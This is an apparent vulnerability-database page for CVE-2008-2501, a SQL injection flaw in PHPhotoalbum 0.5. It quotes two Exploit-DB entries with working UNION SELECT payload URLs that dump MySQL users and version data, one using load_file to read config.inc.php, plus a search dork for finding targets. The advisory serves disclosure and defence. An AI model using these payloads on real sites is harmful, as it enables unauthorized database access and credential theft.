CVE-2008-2501
published 2008-05-29CVE-2008-2501: Multiple SQL injection vulnerabilities in PHPhotoalbum 0.5 allow remote attackers to execute arbitrary SQL commands via the (1) album parameter to…
PriorityP343high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.01%
58.7th percentile
Multiple SQL injection vulnerabilities in PHPhotoalbum 0.5 allow remote attackers to execute arbitrary SQL commands via the (1) album parameter to thumbnails.php and the (2) pid parameter to displayimage.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| henning_stoverud | phphotoalbum | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
PHPhotoalbum 0.5 - SQL Injection
exploitdb·2009-12-21
CVE-2008-2501 PHPhotoalbum 0.5 - SQL Injection
PHPhotoalbum 0.5 - SQL Injection
---
# Title: PHPhotoalbum Remote sql injection Vulnerability
# Tested on: windows
http://server/PHPhotoalbum/thumbnails.php?album=-1+union+select+user+from+mysql.user--
http://server/PHPhotoalbum/thumbnails.php?album=-1+union+select+load_file(/directory hex/config.inc.php)+from+mysql.user--
Exploit-DB
PHPhotoalbum 0.5 - Multiple SQL Injections
exploitdb·2008-05-28
CVE-2008-2501 PHPhotoalbum 0.5 - Multiple SQL Injections
PHPhotoalbum 0.5 - Multiple SQL Injections
---
###############################################################################
#
# Name : PHPhotoalbum v0.5 Multiple Remote SQL Injection Vulnerabilities
# Author : cOndemned
# Dork : intext:PHPhotoalbum v0.5
# Greetz : ZaBeaTy, str0ke, TBH, Hawk, doctor, Sandtalker, Avantura ;**
#
###############################################################################
Proof of Concept :
http://[host]/[path]/thumbnails.php?album=-1+union+select+concat_ws(0x10,now(),version(),user(),database())/*
http://[host]/[path]/displayimage.php?pid=-1+union+select+1,2,3,now(),version(),user()/*
###############################################################################
#
# Together we stand tall, Not gonna crash, not gonna fall - Children of Bodom
#
##
No writeups or analysis indexed.
2008-05-29
Published